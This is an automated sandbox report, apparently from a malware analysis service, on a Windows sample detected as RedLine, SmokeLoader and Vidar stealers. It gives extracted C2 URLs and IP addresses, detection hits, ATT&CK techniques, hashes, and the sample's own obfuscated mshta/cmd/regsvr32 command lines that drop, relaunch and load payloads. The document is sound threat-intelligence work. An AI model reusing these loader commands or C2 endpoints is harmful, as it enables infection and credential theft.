redline | b5a2bb540684ed8d76719289fb97b63eab089cf39350e06e728ec13e84c81340

Analysis

max time kernel
153s
max time network
155s
platform
windows10_x64
resource
win10-en-20211014
submitted
16-11-2021 18:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

05da40ffe5334fa39912829056a041ae.exe
Size

325KB
MD5

05da40ffe5334fa39912829056a041ae
SHA1

a0fbf5bd01a664440bf3ed50d0fdb570871aee36
SHA256

b5a2bb540684ed8d76719289fb97b63eab089cf39350e06e728ec13e84c81340
SHA512

ca51116c37f7ae0d9a6e1d2491a0fba9554bbb26cfaf89e69f3001ca851d95dda16df629b87bf64796cfb988e2e97d925caed0d618272c90ff913ecc95c6c9f7

Score

10^/10

redline smokeloader vidar 706 imbest backdoor collection discovery infostealer spyware stealer suricata trojan

Malware Config

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/

rc4.i32

Extracted

Family

redline

185.159.80.90:38637

Extracted

Family

redline

Botnet

imbest

45.153.186.153:56675

Extracted

Family

vidar

Version

48.5

Botnet

706

https://koyu.space/@tttaj

Attributes

profile_id
706

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1900-143-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/1900-144-0x0000000000418EEA-mapping.dmp	family_redline
behavioral2/memory/4976-195-0x0000000004280000-0x00000000042AD000-memory.dmp	family_redline
behavioral2/memory/4976-200-0x00000000043D0000-0x00000000043FC000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/1028-220-0x0000000004060000-0x0000000004135000-memory.dmp	family_vidar
behavioral2/memory/1028-224-0x0000000000400000-0x0000000002414000-memory.dmp	family_vidar

Downloads MZ/PE file
Executes dropped EXE 9 IoCs

Processes:

34B3.exe34B3.exe4A9E.exe580C.exe4A9E.exeDA0E.exeGEpth.eXeEF5C.exe8A2.exe

pid process

644 34B3.exe
920 34B3.exe
1216 4A9E.exe
1972 580C.exe
1900 4A9E.exe
4516 DA0E.exe
3168 GEpth.eXe
4976 EF5C.exe
1028 8A2.exe
Deletes itself 1 IoCs

Processes:

pid process

2880
Loads dropped DLL 3 IoCs

Processes:

regsvr32.exe8A2.exe

pid process

364 regsvr32.exe
1028 8A2.exe
1028 8A2.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
644	34B3.exe
920	34B3.exe
1216	4A9E.exe
1972	580C.exe
1900	4A9E.exe
4516	DA0E.exe
3168	GEpth.eXe
4976	EF5C.exe
1028	8A2.exe

pid	process
2880

pid	process
364	regsvr32.exe
1028	8A2.exe
1028	8A2.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 3 IoCs

Processes:

05da40ffe5334fa39912829056a041ae.exe34B3.exe4A9E.exe

description	pid	process	target process
PID 4176 set thread context of 4264	4176	05da40ffe5334fa39912829056a041ae.exe	05da40ffe5334fa39912829056a041ae.exe
PID 644 set thread context of 920	644	34B3.exe	34B3.exe
PID 1216 set thread context of 1900	1216	4A9E.exe	4A9E.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

05da40ffe5334fa39912829056a041ae.exe34B3.exe580C.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	05da40ffe5334fa39912829056a041ae.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	34B3.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	34B3.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	580C.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	05da40ffe5334fa39912829056a041ae.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	05da40ffe5334fa39912829056a041ae.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	580C.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	34B3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	580C.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

8A2.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	8A2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	8A2.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2388 taskkill.exe

pid	process
2388	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

05da40ffe5334fa39912829056a041ae.exe

pid	process
4264	05da40ffe5334fa39912829056a041ae.exe
4264	05da40ffe5334fa39912829056a041ae.exe
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2880
Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

05da40ffe5334fa39912829056a041ae.exe34B3.exe580C.exe

pid process

4264 05da40ffe5334fa39912829056a041ae.exe
920 34B3.exe
1972 580C.exe
2880
2880
2880
2880

pid	process
2880

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

4A9E.exetaskkill.exe

description	pid	process
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeDebugPrivilege	1900	4A9E.exe
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeDebugPrivilege	2388	taskkill.exe
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

05da40ffe5334fa39912829056a041ae.exe34B3.exe4A9E.exeDA0E.exemshta.execmd.exeGEpth.eXemshta.exemshta.execmd.exe

description	pid	process	target process
PID 4176 wrote to memory of 4264	4176	05da40ffe5334fa39912829056a041ae.exe	05da40ffe5334fa39912829056a041ae.exe
PID 4176 wrote to memory of 4264	4176	05da40ffe5334fa39912829056a041ae.exe	05da40ffe5334fa39912829056a041ae.exe
PID 4176 wrote to memory of 4264	4176	05da40ffe5334fa39912829056a041ae.exe	05da40ffe5334fa39912829056a041ae.exe
PID 4176 wrote to memory of 4264	4176	05da40ffe5334fa39912829056a041ae.exe	05da40ffe5334fa39912829056a041ae.exe
PID 4176 wrote to memory of 4264	4176	05da40ffe5334fa39912829056a041ae.exe	05da40ffe5334fa39912829056a041ae.exe
PID 4176 wrote to memory of 4264	4176	05da40ffe5334fa39912829056a041ae.exe	05da40ffe5334fa39912829056a041ae.exe
PID 2880 wrote to memory of 644	2880		34B3.exe
PID 2880 wrote to memory of 644	2880		34B3.exe
PID 2880 wrote to memory of 644	2880		34B3.exe
PID 644 wrote to memory of 920	644	34B3.exe	34B3.exe
PID 644 wrote to memory of 920	644	34B3.exe	34B3.exe
PID 644 wrote to memory of 920	644	34B3.exe	34B3.exe
PID 644 wrote to memory of 920	644	34B3.exe	34B3.exe
PID 644 wrote to memory of 920	644	34B3.exe	34B3.exe
PID 644 wrote to memory of 920	644	34B3.exe	34B3.exe
PID 2880 wrote to memory of 1216	2880		4A9E.exe
PID 2880 wrote to memory of 1216	2880		4A9E.exe
PID 2880 wrote to memory of 1216	2880		4A9E.exe
PID 1216 wrote to memory of 1900	1216	4A9E.exe	4A9E.exe
PID 1216 wrote to memory of 1900	1216	4A9E.exe	4A9E.exe
PID 1216 wrote to memory of 1900	1216	4A9E.exe	4A9E.exe
PID 2880 wrote to memory of 1972	2880		580C.exe
PID 2880 wrote to memory of 1972	2880		580C.exe
PID 2880 wrote to memory of 1972	2880		580C.exe
PID 1216 wrote to memory of 1900	1216	4A9E.exe	4A9E.exe
PID 1216 wrote to memory of 1900	1216	4A9E.exe	4A9E.exe
PID 1216 wrote to memory of 1900	1216	4A9E.exe	4A9E.exe
PID 1216 wrote to memory of 1900	1216	4A9E.exe	4A9E.exe
PID 1216 wrote to memory of 1900	1216	4A9E.exe	4A9E.exe
PID 2880 wrote to memory of 4516	2880		DA0E.exe
PID 2880 wrote to memory of 4516	2880		DA0E.exe
PID 2880 wrote to memory of 4516	2880		DA0E.exe
PID 4516 wrote to memory of 1104	4516	DA0E.exe	mshta.exe
PID 4516 wrote to memory of 1104	4516	DA0E.exe	mshta.exe
PID 4516 wrote to memory of 1104	4516	DA0E.exe	mshta.exe
PID 1104 wrote to memory of 1364	1104	mshta.exe	cmd.exe
PID 1104 wrote to memory of 1364	1104	mshta.exe	cmd.exe
PID 1104 wrote to memory of 1364	1104	mshta.exe	cmd.exe
PID 1364 wrote to memory of 3168	1364	cmd.exe	GEpth.eXe
PID 1364 wrote to memory of 3168	1364	cmd.exe	GEpth.eXe
PID 1364 wrote to memory of 3168	1364	cmd.exe	GEpth.eXe
PID 1364 wrote to memory of 2388	1364	cmd.exe	taskkill.exe
PID 1364 wrote to memory of 2388	1364	cmd.exe	taskkill.exe
PID 1364 wrote to memory of 2388	1364	cmd.exe	taskkill.exe
PID 3168 wrote to memory of 4568	3168	GEpth.eXe	mshta.exe
PID 3168 wrote to memory of 4568	3168	GEpth.eXe	mshta.exe
PID 3168 wrote to memory of 4568	3168	GEpth.eXe	mshta.exe
PID 4568 wrote to memory of 3668	4568	mshta.exe	cmd.exe
PID 4568 wrote to memory of 3668	4568	mshta.exe	cmd.exe
PID 4568 wrote to memory of 3668	4568	mshta.exe	cmd.exe
PID 3168 wrote to memory of 2940	3168	GEpth.eXe	mshta.exe
PID 3168 wrote to memory of 2940	3168	GEpth.eXe	mshta.exe
PID 3168 wrote to memory of 2940	3168	GEpth.eXe	mshta.exe
PID 2940 wrote to memory of 5024	2940	mshta.exe	cmd.exe
PID 2940 wrote to memory of 5024	2940	mshta.exe	cmd.exe
PID 2940 wrote to memory of 5024	2940	mshta.exe	cmd.exe
PID 5024 wrote to memory of 600	5024	cmd.exe	cmd.exe
PID 5024 wrote to memory of 600	5024	cmd.exe	cmd.exe
PID 5024 wrote to memory of 600	5024	cmd.exe	cmd.exe
PID 5024 wrote to memory of 876	5024	cmd.exe	cmd.exe
PID 5024 wrote to memory of 876	5024	cmd.exe	cmd.exe
PID 5024 wrote to memory of 876	5024	cmd.exe	cmd.exe
PID 5024 wrote to memory of 364	5024	cmd.exe	regsvr32.exe
PID 5024 wrote to memory of 364	5024	cmd.exe	regsvr32.exe

outlook_office_path 1 IoCs

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

outlook_win_path 1 IoCs

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

C:\Users\Admin\AppData\Local\Temp\05da40ffe5334fa39912829056a041ae.exe
"C:\Users\Admin\AppData\Local\Temp\05da40ffe5334fa39912829056a041ae.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4176

C:\Users\Admin\AppData\Local\Temp\05da40ffe5334fa39912829056a041ae.exe
"C:\Users\Admin\AppData\Local\Temp\05da40ffe5334fa39912829056a041ae.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4264

C:\Users\Admin\AppData\Local\Temp\34B3.exe
C:\Users\Admin\AppData\Local\Temp\34B3.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:644

C:\Users\Admin\AppData\Local\Temp\34B3.exe
C:\Users\Admin\AppData\Local\Temp\34B3.exe
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:920

C:\Users\Admin\AppData\Local\Temp\4A9E.exe
C:\Users\Admin\AppData\Local\Temp\4A9E.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1216

C:\Users\Admin\AppData\Local\Temp\4A9E.exe
C:\Users\Admin\AppData\Local\Temp\4A9E.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Users\Admin\AppData\Local\Temp\580C.exe
C:\Users\Admin\AppData\Local\Temp\580C.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1972

C:\Users\Admin\AppData\Local\Temp\DA0E.exe
C:\Users\Admin\AppData\Local\Temp\DA0E.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4516

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBScriPt: clOse( CrEateObjECT( "Wscript.SHELL"). RUn ("CmD.EXe /Q /R TYpE ""C:\Users\Admin\AppData\Local\Temp\DA0E.exe"" > ..\GEpth.eXe && sTaRT ..\GEpTH.eXE /PWvkDiYa1vO4kkeo6dmUXtDkxgvu &IF """" == """" for %z in (""C:\Users\Admin\AppData\Local\Temp\DA0E.exe"") do taskkill /IM ""%~nXz"" -F " , 0, true) )
2⤵
- Suspicious use of WriteProcessMemory
PID:1104

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /R TYpE "C:\Users\Admin\AppData\Local\Temp\DA0E.exe" > ..\GEpth.eXe && sTaRT ..\GEpTH.eXE /PWvkDiYa1vO4kkeo6dmUXtDkxgvu &IF "" =="" for %z in ("C:\Users\Admin\AppData\Local\Temp\DA0E.exe") do taskkill /IM "%~nXz" -F
3⤵
- Suspicious use of WriteProcessMemory
PID:1364

C:\Users\Admin\AppData\Local\Temp\GEpth.eXe
..\GEpTH.eXE /PWvkDiYa1vO4kkeo6dmUXtDkxgvu
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3168

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBScriPt: clOse( CrEateObjECT( "Wscript.SHELL"). RUn ("CmD.EXe /Q /R TYpE ""C:\Users\Admin\AppData\Local\Temp\GEpth.eXe"" > ..\GEpth.eXe && sTaRT ..\GEpTH.eXE /PWvkDiYa1vO4kkeo6dmUXtDkxgvu &IF ""/PWvkDiYa1vO4kkeo6dmUXtDkxgvu "" == """" for %z in (""C:\Users\Admin\AppData\Local\Temp\GEpth.eXe"") do taskkill /IM ""%~nXz"" -F " , 0, true) )
5⤵
- Suspicious use of WriteProcessMemory
PID:4568

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /R TYpE "C:\Users\Admin\AppData\Local\Temp\GEpth.eXe" > ..\GEpth.eXe && sTaRT ..\GEpTH.eXE /PWvkDiYa1vO4kkeo6dmUXtDkxgvu &IF "/PWvkDiYa1vO4kkeo6dmUXtDkxgvu " =="" for %z in ("C:\Users\Admin\AppData\Local\Temp\GEpth.eXe") do taskkill /IM "%~nXz" -F
6⤵
PID:3668

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscRipt: clOse ( CrEAteoBJEcT ( "wSCRipT.shEll" ). rUn ( "cMD /r Echo | sET /P = ""MZ"" > b_YXEl0G._J & CoPY /Y /B b_YXEL0G._J+ VJM7A_.O + RTKwu.VjJ ..\F3Os.H & del /q *& staRt regsvr32 -u /s ..\f3OS.H " ,0 , trUE ) )
5⤵
- Suspicious use of WriteProcessMemory
PID:2940

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r Echo | sET /P = "MZ" > b_YXEl0G._J & CoPY /Y /B b_YXEL0G._J+ VJM7A_.O + RTKwu.VjJ ..\F3Os.H & del /q *& staRt regsvr32 -u /s ..\f3OS.H
6⤵
- Suspicious use of WriteProcessMemory
PID:5024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Echo "
7⤵
PID:600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>b_YXEl0G._J"
7⤵
PID:876

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 -u /s ..\f3OS.H
7⤵
- Loads dropped DLL
PID:364

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM "DA0E.exe" -F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2388

C:\Users\Admin\AppData\Local\Temp\EF5C.exe
C:\Users\Admin\AppData\Local\Temp\EF5C.exe
1⤵
- Executes dropped EXE
PID:4976

C:\Users\Admin\AppData\Local\Temp\8A2.exe
C:\Users\Admin\AppData\Local\Temp\8A2.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1028

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:2044

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1308

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4A9E.exe.log
MD5
41fbed686f5700fc29aaccf83e8ba7fd

SHA1
5271bc29538f11e42a3b600c8dc727186e912456

SHA256
df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

SHA512
234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

Download Submit
C:\Users\Admin\AppData\Local\Temp\34B3.exe
MD5
4d6eef4e206845c775283d2975109e13

SHA1
6703aa99dd04234ae9f58f6be5157f505cf6967f

SHA256
cc7e2217428f14e3a06133bdf794f3b6d0736d6903fb1baf9a475e346ae92525

SHA512
8bf8a6a1667be3155dbd7b76a97d0e41ecd01b56113778e215dbef33f163f74cc6a8359c8f556a1193811a00aed1c6a5c360d34b0145b3745214184341ba4844

Download Submit
C:\Users\Admin\AppData\Local\Temp\34B3.exe
MD5
4d6eef4e206845c775283d2975109e13

SHA1
6703aa99dd04234ae9f58f6be5157f505cf6967f

SHA256
cc7e2217428f14e3a06133bdf794f3b6d0736d6903fb1baf9a475e346ae92525

SHA512
8bf8a6a1667be3155dbd7b76a97d0e41ecd01b56113778e215dbef33f163f74cc6a8359c8f556a1193811a00aed1c6a5c360d34b0145b3745214184341ba4844

Download Submit
C:\Users\Admin\AppData\Local\Temp\34B3.exe
MD5
4d6eef4e206845c775283d2975109e13

SHA1
6703aa99dd04234ae9f58f6be5157f505cf6967f

SHA256
cc7e2217428f14e3a06133bdf794f3b6d0736d6903fb1baf9a475e346ae92525

SHA512
8bf8a6a1667be3155dbd7b76a97d0e41ecd01b56113778e215dbef33f163f74cc6a8359c8f556a1193811a00aed1c6a5c360d34b0145b3745214184341ba4844

Download Submit
C:\Users\Admin\AppData\Local\Temp\4A9E.exe
MD5
5e34695c9f46f1e69ce731d3b7359c88

SHA1
e1e5bb43f0c7556bcccc8cb698f854694bdc024a

SHA256
97f96815d81f9c1c8ede31f1c21fda2bee7cbab3490184ef833d9d2e8c17e6fc

SHA512
659fa0b695942c35dd4ef499d6c01d9b2a8c23254ea31465a126fd71a0d542ee71da9349ffc8226083393ed37c0668f63c97cc7ef3e014eae793b1f1ba7d6b43

Download Submit
C:\Users\Admin\AppData\Local\Temp\4A9E.exe
MD5
5e34695c9f46f1e69ce731d3b7359c88

SHA1
e1e5bb43f0c7556bcccc8cb698f854694bdc024a

SHA256
97f96815d81f9c1c8ede31f1c21fda2bee7cbab3490184ef833d9d2e8c17e6fc

SHA512
659fa0b695942c35dd4ef499d6c01d9b2a8c23254ea31465a126fd71a0d542ee71da9349ffc8226083393ed37c0668f63c97cc7ef3e014eae793b1f1ba7d6b43

Download Submit
C:\Users\Admin\AppData\Local\Temp\4A9E.exe
MD5
5e34695c9f46f1e69ce731d3b7359c88

SHA1
e1e5bb43f0c7556bcccc8cb698f854694bdc024a

SHA256
97f96815d81f9c1c8ede31f1c21fda2bee7cbab3490184ef833d9d2e8c17e6fc

SHA512
659fa0b695942c35dd4ef499d6c01d9b2a8c23254ea31465a126fd71a0d542ee71da9349ffc8226083393ed37c0668f63c97cc7ef3e014eae793b1f1ba7d6b43

Download Submit
C:\Users\Admin\AppData\Local\Temp\580C.exe
MD5
d985b4cfdceecc3c0fe4f3e4fda4e416

SHA1
f3c14a4d87569e54faaf0eac73ec1aafa2621dfa

SHA256
a8b37d6b073ee045ae63473cb1a592c974e896b19e3db06d552f955901c06db7

SHA512
560a056c076db6893f6407807d9a10d1078c148aa588d9de6ce1874eeac0a4feaf2102b656ba96316a32c89df97986f20cf77e55117e2c9bf97e52ef3381335c

Download Submit
C:\Users\Admin\AppData\Local\Temp\580C.exe
MD5
d985b4cfdceecc3c0fe4f3e4fda4e416

SHA1
f3c14a4d87569e54faaf0eac73ec1aafa2621dfa

SHA256
a8b37d6b073ee045ae63473cb1a592c974e896b19e3db06d552f955901c06db7

SHA512
560a056c076db6893f6407807d9a10d1078c148aa588d9de6ce1874eeac0a4feaf2102b656ba96316a32c89df97986f20cf77e55117e2c9bf97e52ef3381335c

Download Submit
C:\Users\Admin\AppData\Local\Temp\8A2.exe
MD5
b932b524f64444460c3191773612f1b1

SHA1
35ab51fc4186431021aa530619e4870e0574274a

SHA256
6aebdc6a86609a2531a53d96a1ebdaf6ae3987ed25e7482f16bd1854c7ef0e9a

SHA512
b9c44105dc04f3b0cefffcf1dfee7ca2b0acfb8b1b3ea5d19fffe3bd720f5fd633dc5c1980672f7e0f67683f0fad784d012b0fba755aeabe048d2327bb89513c

Download Submit
C:\Users\Admin\AppData\Local\Temp\8A2.exe
MD5
b932b524f64444460c3191773612f1b1

SHA1
35ab51fc4186431021aa530619e4870e0574274a

SHA256
6aebdc6a86609a2531a53d96a1ebdaf6ae3987ed25e7482f16bd1854c7ef0e9a

SHA512
b9c44105dc04f3b0cefffcf1dfee7ca2b0acfb8b1b3ea5d19fffe3bd720f5fd633dc5c1980672f7e0f67683f0fad784d012b0fba755aeabe048d2327bb89513c

Download Submit
C:\Users\Admin\AppData\Local\Temp\DA0E.exe
MD5
d8a81f4f7e64f2e5f3c4bef85c23931b

SHA1
6df6b63f7c717945d57ac8e9189efb1c42aa6a24

SHA256
361cd0082558c6df0e588cb71d77115f58d1880242a713e2bb74b02e19d6b4bd

SHA512
98d196ed25be9d2f2471f8ef0a737f50705975ff93fc2451b588e89d9b4fe866352e8e5904b9140f1c7bcc7fcad8748c637253922caa091fb17ebcf08f8243f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\DA0E.exe
MD5
d8a81f4f7e64f2e5f3c4bef85c23931b

SHA1
6df6b63f7c717945d57ac8e9189efb1c42aa6a24

SHA256
361cd0082558c6df0e588cb71d77115f58d1880242a713e2bb74b02e19d6b4bd

SHA512
98d196ed25be9d2f2471f8ef0a737f50705975ff93fc2451b588e89d9b4fe866352e8e5904b9140f1c7bcc7fcad8748c637253922caa091fb17ebcf08f8243f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\EF5C.exe
MD5
daeffa9ee5a90d60bad2a72b1810f728

SHA1
65f53c53544cac63ebed7af547f4704ca77211ee

SHA256
1bd554b3c8d01435f5a315351419e0f13549a98be4617d938e38a6a4c852ac72

SHA512
a6a6afc911732d9a687b7cafb57dc5816810382748f6831df246dd1d8a0466dcbac40b6ea30494e336d85a75d7155926d8abf13aed4b613a8203e4da95cad265

Download Submit
C:\Users\Admin\AppData\Local\Temp\EF5C.exe
MD5
daeffa9ee5a90d60bad2a72b1810f728

SHA1
65f53c53544cac63ebed7af547f4704ca77211ee

SHA256
1bd554b3c8d01435f5a315351419e0f13549a98be4617d938e38a6a4c852ac72

SHA512
a6a6afc911732d9a687b7cafb57dc5816810382748f6831df246dd1d8a0466dcbac40b6ea30494e336d85a75d7155926d8abf13aed4b613a8203e4da95cad265

Download Submit
C:\Users\Admin\AppData\Local\Temp\GEpth.eXe
MD5
d8a81f4f7e64f2e5f3c4bef85c23931b

SHA1
6df6b63f7c717945d57ac8e9189efb1c42aa6a24

SHA256
